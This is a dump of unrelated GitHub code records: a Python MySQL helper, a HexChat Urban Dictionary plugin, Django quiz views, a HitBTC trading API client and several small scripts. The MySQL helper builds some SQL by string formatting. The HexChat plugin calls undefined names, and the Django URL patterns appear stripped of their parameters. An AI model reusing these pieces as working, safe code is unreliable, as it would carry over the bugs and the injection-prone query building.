将传入的字典或字典列表 replcae into \n 返回受影响的行数\n @columns: 限定影响的字段\n \"\"\"\n sql, param = self.generate_replace_into_sql(table, data, columns)\n return self.execute_sql(sql, param, **kwargs)[1]\n\n def update_by_primary(self, table: str, data: dict, pri_value, columns=None, cache=True, **kwargs):\n \"\"\"\n 通过主键去更新\n @pri_value :主键的值\n @data: 更新的目标值。传入的字典将会转化为 update xxx set key=value,key2=value2 的 形式\n @cache: 是否缓存表的主键,避免频繁查询表的主键\n @columns: 限定影响的字段\n 返回受影响的条数(这里正常只会返回 1或0)\n \"\"\"\n primary = self._get_primary_key(table, cache)\n sql, param = self.generate_update_sql_by_primary(table, data, pri_value, columns, primary)\n return self.execute_sql(sql, param, **kwargs)[1]\n\n def update(self, table: str, data: dict, where: Union[dict, str], columns: Union[Tuple[str], List[str], str] = None, limit: int = None, **kwargs):\n \"\"\"\n @data: 要被更新的数据,传入字典将会转化为 update xxx set key=value,key2=value2 的 形式\n @columns: 限定被影响的字段。默认为空,即不限定。则传入的data字典的所有键值对都会被映射为字段和值。\n @where: where 条件,使用该条件去找出哪些数据要被更新。\n 如果where 为 字典,则根据字典映射成 where key=value\n 如果是str,则直接将改该字符串拼接到 where 关键字之后\n 如果是 可迭代对象,则会将该对象中的所有元素key对应的 data[key] 取出,作为where条件的映射。\n 例如 data={\"name\":\"jack\",\"age\":18,\"gender\":0} ,where =[\"name\",] ,columns=[\"age\",\"gender\"] \n --> update xx set `age`=18,`gender`=0 where `name`=\"jack\"\n \"\"\"\n sql, param = self.generate_update_sql(table, data, where, columns, limit)\n return self.execute_sql(sql, param, **kwargs)[1]\n\n def delete_by_primary(self, table: str, pri_value, cache=True, **kwargs):\n \"\"\"\n 通过主键删除数据,这里要先查出主键,不允许指定,即使大部分场景下主键是id。\n @pri_value :主键的值\n @cache: 是否缓存表的主键,避免频繁查询表的主键\n 返回受影响的条数(这里正常只会返回 1或0)\n \"\"\"\n primary = self._get_primary_key(table, cache)\n sql = \"DELETE FROM {} WHERE `{}`=%s \".format(table, primary)\n return self.execute_sql(sql, (pri_value,),**kwargs)[1]\n\n def _get_primary_key(self, table: str, cache=True):\n \"\"\"\n 获取表的主键\n @cache: 是否缓存该表的主键\n \"\"\"\n primary = None\n if cache:\n primary = self._primary_key_cache.get(table, None)\n if not primary:\n sql = \"SELECT column_name FROM INFORMATION_SCHEMA.`KEY_COLUMN_USAGE` WHERE table_name='{}' AND constraint_name='PRIMARY'\".format(table)\n result = self.execute_sql(sql, cursor_type='default')\n primary = result[0][0][0]\n if cache:\n self._primary_key_cache[table] = primary\n return primary\n\n def delete(self, table: str, where: str or dict, limit: int = None, **kwargs):\n \"\"\"\n 根据传入的条件 删除对应的数据\n 必须传入条件,避免因为漏参数而删除整个表。\n 返回受影响的条数 \n \"\"\"\n sql, param = self.generate_delete_sql(table, where, limit, **kwargs)\n return self.execute_sql(sql, param, **kwargs)[1]\n\n def get_multiqueries(self, sql: str or list, params: Union[tuple, dict, List[tuple], List[dict]] = None, cursor_type=None):\n \"\"\"\n 同时执行多个sql ,一次性返回所有结果集.但是需要在初始化连接时,引入CLIENT.MULTI_STATEMENTS 作为连接参数实例化连接\n from pymysql.constants import CLIENT\n client_flag=CLIENT.MULTI_STATEMENTS\n connargs={\"client_flag\":client_flag}\n conn=MysqlConnection(**connargs)\n @sql: 以分号; 进行连接的多条语句 或 sql 列表\n @params: sql对应的参数列表\n @cursor_type : 游标类型\n \"\"\"\n assert self.connargs.get('client_flag', None) == CLIENT.MULTI_STATEMENTS, \"使用该方法必须在实例化连接时引入client_flag参数。参考:https://blog.csdn.net/qq_33634196/article/details/119883045\"\n conn = self._get_connection()\n if isinstance(sql, list):\n sql = ';'.join(sql)\n if isinstance(cursor_type, str):\n assert cursor_type.lower() in ('default', 'dict', None), \"仅支持默认游标(default)和字典游标(dict)\"\n cursor = self._get_cursor(conn, cursor_type=cursor_type) # 此处由于需要返回查询结果集,所以不支持流式游标\n try:\n cursor.execute(sql, params)\n results = []\n results.append(cursor.fetchall())\n while cursor.nextset():\n results.append(cursor.fetchall())\n conn.commit() # 这个要在最后进行提交\n return results\n except Exception as e:\n cursor.close()\n conn.rollback()\n traceback.print_exc()\n return OperationError(e)\n\n\nclass MysqlConnection(MysqlSqler, _SimpleConnector):\n\n charset = \"utf8mb4\"\n\n def merge_into(self, table: str, data: dict or List[dict], columns: Union[Tuple[str], List[str], str] = None, merge_columns: Union[Tuple[str], List[str], str] = None, **kwargs):\n \"\"\"\n 合并数据。mysql 不支持原生的merge into。这里通过 insert into ... on duplicate key update ...来实现\n @data:需要被合并的数据\n @columns:限定被影响的字段。默认是传入的data中的所有字段被会被影响\n @merge_columns:产生重复时,需要被更新的字段,默认是全部受影响的字段都被覆盖\n 返回受影响的条数\n \"\"\"\n sql, param = self.generate_merge_sql(table, data, columns, merge_columns, **kwargs)\n return self.execute_sql(sql, param, **kwargs)[1]\n\n @property\n def tables(self):\n if hasattr(self, '_tables'):\n return self._tables\n all_tables, _ = self.execute_sql(\"show tables\")\n setattr(self, '_tables', tuple(d[0] for d in all_tables))\n return self._tables\n\n\nclass _SimplePoolConnector(object):\n _creator = None\n\n def _init_connargs(self, **kwargs):\n args_dict = self._set_conn_var(**kwargs)\n # 默认参数,参照 sqlalchemy 的连接池参数,进行初始化配置,(除了 SET AUTOCOMMIT = 1 之外,因为这个类的事务都是底层手动提交的,只是看起来和自动提交一样)\n # 1 20 0 0 False None ['SET AUTOCOMMIT = 1'] True None 1\n connargs = {\"host\": self.host, \"user\": self.user, \"password\": self.password, \"database\": self.database, 'port': self.port, \"charset\": self.charset,\n \"creator\": self._creator, \"mincached\": 1, \"maxcached\": 20, \"blocking\": False}\n\n # mincached : 启动时开启的空连接数量(0代表开始时不创建连接)\n # maxcached : 连接池最大可共享连接数量(0代表不闲置连接池大小)\n # maxshared : 共享连接数允许的最大数量(0代表所有连接都是专用的)如果达到了最大数量,被请求为共享的连接将会被共享使用\n # maxconnecyions : 创建连接池的最大数量(0代表不限制)\n # blocking : 达到最大数量时是否阻塞(0或False代表返回一个错误; 其他代表阻塞直到连接数减少,连接被分配)\n # maxusage : 单个连接的最大允许复用次数(0或False代表不限制的复用).当达到最大数时,连接会自动重新连接(关闭和重新打开)\n # setsession : 用于传递到数据库的准备会话,如 [”set name UTF-8″]\n connargs.update(args_dict)\n return connargs\n\n def __init__(self, *args, **kwargs):\n self.connargs = self._init_connargs(*args, **kwargs)\n self.connection_pool = PooledDB(**self.connargs)\n\n def _get_connection(self):\n return self.connection_pool.connection()\n\n\nclass MysqlPool(_SimplePoolConnector, MysqlConnection):\n\n port = 3306\n _creator = pymysql\n\n def __init__(self, **kwargs):\n connargs = self._init_connargs(**kwargs)\n self.connargs = self._choose_cursor_class(connargs)\n self.connection_pool = PooledDB(**self.connargs)","repo_name":"lishukan/directsql","sub_path":"directsql/connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":27838,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"} +{"seq_id":"14115844637","text":"\" This is a module for xchat2 / hexchat \"\n# problem: any http request could take up to 30 seconds\n# but we can't block all of hexchat to wait\n# AND 'threading' module will sometimes crash ALL of hexchat\n# (may be a persistent bug in Gtk_object)\n# when trying to modify gtk objects from a child thread\n# \"don't update gtk ui directly from any thread\"\n# TODO: hexchat uses Python 3.5, try using 'asyncio' module instead?\nimport hexchat\nimport json\nimport re\nfrom threading import Thread\nimport time\nimport urllib.request\n\n# -- config\n# time in seconds between saying stuff out-loud\nTIMEOUT = 5\n\n# channels to listen for the '`ud' trigger\nLISTEN_TO = '#farts #wetfish #test'\n\n# I forget where I learned this URL. it's valid but undocumented\nUD_API = 'http://api.urbandictionary.com/v0/define?page=0&term={}'\n\n\n# -- init\n__module_name__ = \"urbandict\"\n__module_version__ = \"20170701\"\n__module_description__ = \"urban dictionary lookups\"\n__module_author__ = \"Mozai \"\n\n\n# IRC colours as per mIRC:\n# \\x0301 black \\x0302 blue \\x0302,01 blue-on-black \\x0f normal\n# \\x02 bold \\x02 un-bold \\x0f normal\n\n# my god this is ugly; I'm depending on side-effects\n# the alternative is to use context.command() from inside a child thread\n# which will crash all of hexchat :(\n\nCHANNELS = {i: {'req': False, 'resp': False, 'wait': 0} for i in LISTEN_TO.split()}\n\ndef _drone(userdata):\n \" given an entry in dict CHANNELS, populates the 'resp' key \"\n if userdata.get('req') is None:\n return None\n if userdata.get('resp') is not None:\n return userdata['resp']\n answer = None\n try:\n conn = urllib.request.urlopen(UD_API.format(param))\n i = conn.read().decode('utf-8')\n j = json.loads(i)\n if j.get('list'):\n answer = j['list'][0]['definition']\n answer = re.sub(r'\\s+', ' ', defined)\n if len(answer) > 200:\n answer = answer[:195] + ' ...'\n except Exception as err:\n pass # TODO: how to report error without talking to GTK ui elements?\n finally:\n userdata['req'] = None\n userdata['resp'] = answer\n return answer\n\n\ndef _emit_definition(userdata):\n \" (thread) fetch urbandict definition, emit it\"\n # if using .hook_timer(), returning 'True' will re-hook_timer() this\n now = int(time.time())\n if userdata['conch']:\n # we're already running\n return False\n if now <= userdata['wait']:\n # TODO: maybe tell user to wait\n return False\n context = userdata.get('context')\n param = userdata.get('param')\n try:\n userdata['conch'] = True\n conn = urllib.request.urlopen(UD_API.format(param))\n i = conn.read().decode('utf-8')\n j = json.loads(i)\n defined = ''\n if j.get('list'):\n defined = j['list'][0]['definition']\n defined = re.sub(r'\\s+', ' ', defined)\n if len(defined) > 200:\n defined = defined[:195] + ' ...'\n except Exception as err:\n userdata['conch'] = False\n raise\n if context:\n if defined:\n context.command('me \\x02urbdict:\\x02 \"{}\"'.format(defined))\n userdata['wait'] = now + TIMEOUT\n else:\n context.command('me \\x02urbdict:\\x02 \"{}\" not found'.format(param))\n userdata['wait'] = now + 1\n else:\n if defined:\n print('\\x02UD says:\\x02 \"{}\"'.format(defined))\n else:\n print('\\x02UD:\\x02 term \"{}\" not found'.format(param))\n userdata['context'] = None\n userdata['param'] = None\n userdata['conch'] = False\n return False # don't keep repeating the .hook_timeout()\n\n\ndef ud_listening(word, word_eol, userdata):\n del(userdata) # shut up pylint\n context = hexchat.get_context()\n chan = context.get_info('channel')\n userdata = CHANNELS.get(chan)\n if userdata is None:\n return None\n useful = word[1].split(None, 1)\n # \"!ud argle bargle\" -> [\"!ud\", \"argle bargle\"]\n # \"!ud\" -> [\"!ud\"]\n if len(useful) == 2 and useful[0] in ('!ud', '`ud'):\n userdata['context'] = context\n userdata['param'] = useful[1]\n # tried using .hook_timer() because threading is causing crashes\n #userdata['hook'] = hexchat.hook_timer(10, _emit_definition, userdata)\n drone = Thread(target=_emit_nowplaying, args=(userdata,))\n drone.daemon = True\n drone.start()\n\n return hexchat.EAT_PLUGIN\n\n\ndef ud_command(word, word_eol, userdata):\n del(userdata) # shut up pylint\n term = word_eol[1]\n if not term:\n print(\"{} term : go fetch the first UrbanDictionary definition of term\".format(word[0]))\n else:\n userdata = {'conch': False, 'context': None, 'param': term, 'wait': 0}\n userdata['hook'] = hexchat.hook_timer(100, _emit_definition, userdata)\n\n\nhexchat.hook_print('Channel Message', ud_listening)\n# hexchat.hook_server('PRIVMSG', ud_listening)\nhexchat.hook_print('Your Message', ud_listening)\nhexchat.hook_command('ud', ud_command, help='go fetch the furst UrbanDictionary definition of param')\nprint(\"urbdict loaded (!ud term, `ud term, /ud term)\")\n","repo_name":"mozai/xchat-scripts","sub_path":"urbdict_xchat.py","file_name":"urbdict_xchat.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"35022226038","text":"from django.urls import path\nfrom . import views\n\napp_name=\"admissions\"\nurlpatterns = [\n path('', views.index, name='index'),\n path('application/', views.application, name=\"application\"),\n path('application/success/', views.application_success, name=\"application-success\"),\n path('applicants/', views.applicants, name=\"applicants\"),\n path('applicant//', views.view_applicant, name=\"view-applicant\"),\n path('applicant//', views.handle_applicant, name=\"handle-applicant\"),\n path('my-application/', views.my_application, name=\"my-application\")\n]\n","repo_name":"SIS101/SIS101","sub_path":"sis/admissions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"20609639301","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.http import Http404\n\nfrom skil.models import Equestion, Nquestion, Epercent, Npercent\n\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n# Create your views here.\ndef index(request):\n return render(request, 'skil/index.html')\n\ndef esele(request):\n return render(request, 'skil/esele.html')\n\ndef nsele(request):\n return render(request, 'skil/nsele.html')\n\ndef exceltest(request, excel_id):\n if request.method == 'GET':\n excel = Equestion.objects.filter(id__gte=10*excel_id-9).filter(id__lt=10*excel_id+1)\n data = {'excel':excel}\n return render(request, 'skil/excel_test.html', data)\n elif request.method == 'POST':\n op_lst=['option0','option1','option2','option3','option4','option5','option6','option7','option8','option9']\n ans_lst=[]\n your_ans=[]\n xs=[0,1,2,3,4,5,6,7,8,9]\n #ans = request.POST.get(\"option0\")\n excel = Equestion.objects.filter(id__gte=10*excel_id-9).filter(id__lt=10*excel_id+1)\n excela = list(excel.values())\n lst=[]\n for ex in excela:\n lst.append(ex[\"answer\"])\n for op in op_lst:\n ans = request.POST.get(op)\n your_ans.append(ans)\n for n in range(10):\n exc=Epercent.objects.get(pk=10*(excel_id-1)+n+1)\n if your_ans[n] == lst[n]:\n ans_lst.append('正解')\n exc.true += 1\n exc.save()\n else:\n ans_lst.append('不正解')\n exc.false += 1\n exc.save()\n exc.percent = (exc.true/(exc.true+exc.false))\n exc.save()\n return render(request, 'skil/Eanswer.html', {'yans':your_ans, 'ans':ans_lst, 'excel':excela, 'xs':xs})\n \n\ndef nettest(request, net_id):\n if request.method == 'GET':\n net = Nquestion.objects.filter(id__gte=10*net_id-9).filter(id__lt=10*net_id+1)\n data = {'net':net}\n return render(request, 'skil/net_test.html', data)\n elif request.method == 'POST':\n op_lst=['option0','option1','option2','option3','option4','option5','option6','option7','option8','option9']\n ans_lst=[]\n your_ans=[]\n #ans = request.POST.get(\"option0\")\n net = Nquestion.objects.filter(id__gte=10*net_id-9).filter(id__lt=10*net_id+1)\n neta = list(net.values())\n lst=[]\n for nt in neta:\n lst.append(nt[\"answer\"])\n for op in op_lst:\n ans = request.POST.get(op)\n your_ans.append(ans)\n for n in range(10):\n if your_ans[n] == lst[n]:\n ans_lst.append('正解') \n else:\n ans_lst.append('不正解')\n return render(request, 'skil/Nanswer.html', {'yans':your_ans, 'ans':ans_lst, 'net':neta})\n\ndef Eanswer(request, excel_id):\n #if request.method == 'GET':\n excel = Equestion.objects.filter(id__gte=10*excel_id-9).filter(id__lt=10*excel_id+1)\n data = {'excel':excel}\n return render(request, 'skil/Eanswer.html', data)\n\ndef Nanswer(request, net_id):\n net = Nquestion.objects.filter(id__gte=10*net_id-9).filter(id__lt=10*net_id+1)\n data = {'net':net}\n return render(request, 'skil/Nanswer.html', data)\n\ndef epercent(request):\n excels = Equestion.objects.all()\n paginator = Paginator(excels, 10) # 1ページに10件表示\n p = request.GET.get('p') # URLのパラメータから現在のページ番号を取得\n excel = paginator.get_page(p) # 指定のページのArticleを取得\n\n per=Epercent.objects.all()\n paginator = Paginator(per, 10)\n percent = paginator.get_page(p)\n return render(request, 'skil/epercent.html', {'excel': excel, 'p': p, 'percent':percent})\n \ndef npercent(request):\n nets = Nquestion.objects.all()\n paginator = Paginator(nets, 10) # 1ページに10件表示\n p = request.GET.get('p') # URLのパラメータから現在のページ番号を取得\n net = paginator.get_page(p) # 指定のページのArticleを取得\n\n per=Npercent.objects.all()\n paginator = Paginator(per, 10)\n percent = paginator.get_page(p)\n return render(request, 'skil/npercent.html', {'net': net, 'p': p, 'percent':percent})","repo_name":"IsshuTomizawa/skilltest","sub_path":"skil/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"37834604994","text":"import argparse\nimport os\n\n\ndef main():\n day = os.path.basename(__file__).split('-')[0]\n challenge_input = '{}-input.txt'.format(day)\n # challenge_input = '{}-example.txt'.format(day)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--input', default=challenge_input)\n args = parser.parse_args()\n\n lines = []\n with open(args.input, 'r') as infile:\n for line in infile:\n lines.append(line.strip())\n\n line = lines[0]\n up = line.count('(')\n down = line.count(')')\n print('{} + {} = {}'.format(up, down, up - down))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JBailyes/advent-of-code","sub_path":"2015/01-1.py","file_name":"01-1.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"13371890251","text":"from crypto.engine import Exchange\nimport requests\nfrom crypto.structs import Order, Trade, Market, Ticker, Balance, OrderBook, Entry, Candle\nimport dateutil.parser\nfrom crypto.hitbtc.mock import mock_adapter\nimport logging\nimport configparser\nfrom crypto.helpers import print_json\nimport datetime\n\n\nclass HitBTCExchange(Exchange):\n def __init__(self, base_url, key, secret, symbols, mock=True):\n super().__init__(base_url, key, secret, symbols, mock)\n self.session = requests.session()\n if mock:\n self.session.mount('mock', mock_adapter)\n self.session.auth = (self.key, self.secret)\n self.symbols = symbols if not mock else ['ETHBTC', 'LTCBTC', 'ETCBTC']\n self.markets = {}\n self.markets = {s: self.to_market(s) for s in symbols}\n\n # Interface\n def bid(self, market, rate, quantity):\n try:\n status, data = self._order_create(market.symbol, side=\"buy\", price=rate, quantity=quantity)\n if status == 200:\n return self._to_order(data)\n else:\n raise Exception(data['error']['message'])\n except Exception as e:\n logging.exception(\"Error in bid function\")\n\n def ask(self, market, rate, quantity):\n try:\n status, data = self._order_create(market.symbol, side=\"sell\", price=rate, quantity=quantity)\n if status == 200:\n return self._to_order(data)\n else:\n raise Exception(data['error']['message'])\n except Exception as e:\n logging.exception(\"Error in ask function\")\n\n def cancel(self, order_id=None, market=None, all=False):\n try:\n if all:\n status, data = self._orders_cancel()\n orders = list(map(self._to_order, data))\n elif market:\n status, data = self._orders_cancel(market.symbol)\n orders = list(map(self._to_order, data))\n elif order_id:\n status, data = self._order_cancel(order_id)\n orders = [self._to_order(data)]\n else:\n raise Exception('Specify order_id, market, or all')\n return orders\n except Exception as e:\n logging.exception(\"Error in cancel function\")\n\n def balance(self):\n try:\n status, data = self._trading_balance()\n if status == 200:\n return {d['currency']: Balance(d['available'], d['reserved']) for d in data if (float(d['available']) + float(d['reserved'])) > 0}\n else:\n raise Exception(data['error']['message'])\n except Exception as e:\n logging.exception(\"Error in balance function\")\n\n def orders(self, market=None):\n try:\n symbol = market.symbol if market else ''\n status, data = self._orders_active(symbol)\n if status == 200:\n orders = list(map(self._to_order, data))\n return orders\n else:\n raise Exception(data['error']['message'])\n except Exception as e:\n logging.exception(\"Error in orders function\")\n\n def order_book(self, market):\n try:\n status, data = self._orderbook(market.symbol)\n if status == 200:\n asks = [Entry(d['price'], d['size']) for d in data['ask'][:10]]\n bids = [Entry(d['price'], d['size']) for d in data['bid'][:10]]\n orderbook = OrderBook(asks, bids)\n return orderbook\n else:\n raise Exception(data['error']['message'])\n except Exception as e:\n logging.exception(\"Error in order_book function\")\n\n def ticker(self, market=None):\n try:\n symbol = market.symbol if market else ''\n status, data = self._tickers(symbol)\n if status == 200:\n if market:\n return self._to_ticker(data, market)\n else:\n tickers = [self._to_ticker(d) for d in data]\n return tickers\n else:\n raise Exception(data['error']['message'])\n except Exception as e:\n logging.exception(\"Error in ticker function\")\n\n def trades(self, market):\n try:\n status, data = self._history_trades(market.symbol)\n if status == 200:\n trades = [self._to_trade(d, market) for d in data]\n return trades\n else:\n raise Exception(data['error']['message'])\n except Exception as e:\n logging.exception(\"Error in trades function\")\n\n def candles(self, market, start=None, limit=100):\n try:\n status, data = self._candles(market.symbol, limit=limit, period='M1')\n if status == 200:\n candles = [self._to_candle(d, market) for d in data]\n # filter out candles from before start param\n candles = [c for c in candles if start is None or c.time.replace(tzinfo=None) > start.replace(tzinfo=None)]\n return candles\n else:\n raise Exception(data['error']['message'])\n except Exception as e:\n logging.exception(\"Error in candles function\")\n\n # Data conversion\n def to_market(self, symbol):\n m = self.markets.get(symbol, None)\n if not m:\n status, data = self._symbols(symbol)\n if status == 200:\n m = Market(counter=data['baseCurrency'], base=data['quoteCurrency'], symbol=symbol, increment=data['quantityIncrement'],\n make_fee=data['provideLiquidityRate'], take_fee=data['takeLiquidityRate'])\n else:\n raise Exception(data['error']['message'])\n return m\n\n def _split_symbol(self, symbol):\n return symbol[:len(symbol)//2], symbol[len(symbol)//2:]\n\n def _to_order(self, data):\n market = self.markets.get(data['symbol'], None)\n if not market:\n market = self.to_market(data['symbol'])\n created = dateutil.parser.parse(data['createdAt'])\n order = Order(order_id=data['clientOrderId'], market=market, side=data['side'],\n rate=data['price'], quantity=data['cumQuantity'], time=created)\n return order\n\n def _to_trade(self, data, market=None):\n if not market:\n market = self.to_market(data['symbol'])\n time = dateutil.parser.parse(data['timestamp'])\n order_id = data.get('clientOrderId', None)\n trade = Trade(trade_id=data['id'], order_id=order_id, market=market,\n side=data['side'], rate=data['price'], quantity=data['quantity'], time=time)\n return trade\n\n def _to_ticker(self, data, market=None):\n if not market:\n market = self.to_market(data['symbol'])\n time = data['timestamp']\n ticker = Ticker(market=market, ask=data['ask'], bid=data['bid'], low=data['low'], high=data['high'],\n last=data['last'], base_volume=data['volume'], quote_volume=data['volumeQuote'], time=time)\n return ticker\n\n def _to_candle(self, data, market=None):\n if not market:\n market = self.to_market(data['symbol'])\n time = dateutil.parser.parse(data['timestamp'])\n candle = Candle(market=market, open=data['open'], high=data['min'], low=data['max'],\n close=data['close'], volume=data['volume'], time=time)\n return candle\n\n # API Methods\n # Market\n def _currencies(self, currency=''):\n response = self.session.get(self.base_url + '/public/currency/' + currency)\n return response.status_code, response.json()\n\n def _symbols(self, symbol=''):\n response = self.session.get(self.base_url + '/public/symbol/' + symbol)\n return response.status_code, response.json()\n\n def _tickers(self, symbol=''):\n response = self.session.get(self.base_url + '/public/ticker/' + symbol)\n return response.status_code, response.json()\n\n def _trades(self, symbol, sort=None, by=None, _from=None, till=None, limit=None, offset=None):\n payload = {k: v for (k, v) in locals().items() if v is not None and v != self and v != symbol}\n response = self.session.get(self.base_url + '/public/trades/' + symbol, params=payload)\n return response.status_code, response.json()\n\n def _orderbook(self, symbol):\n response = self.session.get(self.base_url + '/public/orderbook/' + symbol)\n return response.status_code, response.json()\n\n def _candles(self, symbol, limit=None, period=None):\n payload = {k: v for (k, v) in locals().items() if v is not None and v != self}\n if period and period not in ['M1', 'M3', 'M5', 'M15', 'M30', 'H1', 'H4', 'D1', 'D7', '1M']:\n raise Exception('Invalid period')\n response = self.session.get(self.base_url + '/public/candles/' + symbol, params=payload)\n return response.status_code, response.json()\n\n # Trading\n def _trading_balance(self):\n response = self.session.get(self.base_url + '/trading/balance')\n return response.status_code, response.json()\n\n def _trading_fee(self, symbol):\n response = self.session.get(self.base_url + '/trading/fee/' + symbol)\n return response.status_code, response.json()\n\n def _orders_active(self, symbol=''):\n payload = {'symbol': symbol}\n response = self.session.get(self.base_url + '/order/', data=payload)\n return response.status_code, response.json()\n\n def _order_active(self, order_id, wait=''):\n if wait:\n payload = {'wait': wait}\n else:\n payload = None\n response = self.session.get(self.base_url + '/order/' + order_id, params=payload)\n return response.status_code, response.json()\n\n def _order_create(self, symbol, side, quantity, price, timeInForce=None,\n type=None, stopPrice=None, expireTime=None, strictValidate=None):\n payload = {k: v for (k, v) in locals().items() if v is not None and v != self}\n if side not in [\"buy\", \"sell\"]:\n raise Exception(\"Invalid side\")\n if timeInForce and timeInForce not in ['GTC', 'IOC', 'FOK', 'Day', 'GTD']:\n raise Exception(\"Invalid timeInForce\")\n if type and type not in ['limit', 'market', 'stopLimit', 'stopMarket']:\n raise Exception('Invalid type')\n if not stopPrice and payload.get('type', '').startswith('stop'):\n raise Exception(\"Stop price required for stop types\")\n if not expireTime and payload.get('timeInForce', '') == 'GTD':\n raise Exception(\"expireTime required for GTD timeInForce\")\n response = self.session.post(self.base_url + '/order', data=payload)\n\n return response.status_code, response.json()\n\n def _orders_cancel(self, symbol=None):\n if symbol:\n payload = {'symbol': symbol}\n else:\n payload = None\n response = self.session.delete(self.base_url + '/order', data=payload)\n return response.status_code, response.json()\n\n def _order_cancel(self, clientOrderId):\n response = self.session.delete(self.base_url + '/order/' + clientOrderId)\n return response.status_code, response.json()\n\n # History\n def _history_orders(self, symbol=None, clientOrderId=None, _from=None, till=None, limit=None, offset=None):\n payload = {k: v for (k, v) in locals().items() if v is not None and v != self}\n if clientOrderId:\n payload = {'clientOrderId': clientOrderId}\n else:\n if _from:\n payload['from'] = payload['_from']\n del payload['_from']\n response = self.session.get(self.base_url + '/history/order', data=payload)\n return response.status_code, response.json()\n\n def _history_trades(self, symbol=None, sort=None, by=None, _from=None, till=None, limit=None, offset=None):\n payload = {k: v for (k, v) in locals().items() if v is not None and v != self}\n if _from:\n payload['from'] = payload['_from']\n del payload['_from']\n response = self.session.get(self.base_url + '/history/trades', data=payload)\n return response.status_code, response.json()\n\n def _history_trade(self, orderId):\n response = self.session.get(self.base_url + '/history/order/' + orderId + '/trades')\n return response.status_code, response.json()\n\n\n# if __name__ == \"__main__\":\n# config = configparser.ConfigParser(allow_no_value=True)\n# config.read(\"../config.ini\")\n# b = HitBTCExchange(config[\"hitbtc\"]['BaseUrl'], config['hitbtc']['Key'], config['hitbtc']['Secret'],\n# config['hitbtc']['Symbols'].split(','), False)\n# # r = b._candles('LTCBTC', period='M1')\n# # print_json(r[-1])\n# print(b.markets)","repo_name":"sohailkhanosu/camelopardalis","sub_path":"bot-engines/crypto/hitbtc/hitbtc.py","file_name":"hitbtc.py","file_ext":"py","file_size_in_byte":12927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"14662425737","text":"from pyfiglet import Figlet\nfrom sys import exit, argv\nimport random\n\n\nflags = [\"-f\", \"--font\"]\nf = Figlet()\nfonts = f.getFonts()\n\nif len(argv) == 3 and argv[1] in flags and argv[2] in fonts:\n text = input(\"Input: \")\n f.setFont(font=argv[2])\n print(\"Output:\\n\", f.renderText(text))\n\nelif len(argv) == 1:\n text = input(\"Input: \")\n f.setFont(font=random.choice(fonts))\n print(\"Output:\\n\", f.renderText(text))\n\nelse:\n exit(\"Invalid usage\")\n","repo_name":"Maximgitman/cs50_python","sub_path":"week_4_Libraries/figlet/figlet.py","file_name":"figlet.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"23146333514","text":"#######################################\n# Contributors (to this file): Nolan Yelverton\n# Date: 04/01/20\n# Description: Settup for how we're going to store our experation dates\n#######################################\n\n# Import datetime so we can get the current time.\nfrom datetime import datetime\n\nclass ExperationTracker(object):\n # Set up a dictionary to store our item's experation dates\n experationDict = {}\n\n # Set up a list to store our items\n itemList = []\n\n def __init__(self):\n pass\n\n # --Begin Accessors & Mutators--\n @property\n def item(self):\n return self._item\n\n @item.setter\n def item(self, item):\n self._item = item\n\n @property\n def date(self):\n return self._date\n\n @date.setter\n def date(self, date):\n self._date = date\n # --End Accessors & Mutators--\n\n # Returns the item that is most about to expire, if it exists\n def __str__(self):\n oldestItem = 0\n\n try:\n return \"Item: {}\\nExp: {}\".format(self.itemList[oldestItem], self.experationDict[self.itemList[oldestItem]])\n except IndexError:\n return \"There are no foods in the list!\"\n \n # Function that can add items & experation dates to our dict.\n # Also stores items into a list of items\n def itemAdder(self, item, date):\n self.experationDict[item] = date\n self.itemList.append(item)\n\n # Function that will remove items when they are expired.\n def itemRemover(self):\n # Get today's date\n today = datetime.today().strftime('%m/%d/%y')\n\n # Split the date into Month/Day/Year\n date = today.split(\"/\")\n\n # Get the oldest food experation date, if it exists\n try:\n oldestItem = self.itemList[0]\n except:\n print(\"There aren't any foods in the list!\")\n\n # Get the date of the oldest item\n experation = self.experationDict[oldestItem]\n\n expDate = experation.split(\"/\")\n\n # If the year of the food's experation date is older than the current date, remove it\n if (expDate[2] < date[2]):\n self.itemList.remove(oldestItem)\n\n # If the month of the food's experation date is older than the current date, remove it\n elif (expDate[0] < date[0]):\n self.itemList.remove(oldestItem)\n\n # If the day of the food's experation date is older than the current date, remove it\n elif (expDate[1] < date[1]):\n self.itemList.remove(oldestItem)\n\n # If the food's experation date is todays date, say that the food expires today\n elif (expDate[0] == date[0] and expDate[1] == date[1]):\n print(\"Your {} expires today!\".format(oldestItem))\n\n # Otherwise, just say nothing has expired\n else:\n print(\"Nothing has expired!\")\n \n#######################################\n\n# Sample of taking an input and handeling experation dates\net = ExperationTracker()\n\nfood = raw_input(\"Please enter the food's name: \")\n\ndate = raw_input(\"Please enter the food's expiration date (MM/DD/YY): \")\n\net.itemAdder(food, date)\nprint(et)\nprint\net.itemRemover()\nprint\nprint(et)\n","repo_name":"Ndymario/132-Project","sub_path":"code/Experation_Tracker/experation_date_tracker.py","file_name":"experation_date_tracker.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"10642879958","text":"#!/usr/bin/python -i\n\n#Created by multiple users\n#Yale Grablab\n#Updated 09/2019\n\nfrom __future__ import print_function\nfrom lib_robotis_mod import *\nimport time\nimport numpy as np\t#for array handling\nimport scipy.io\nimport math\nfrom decimal import 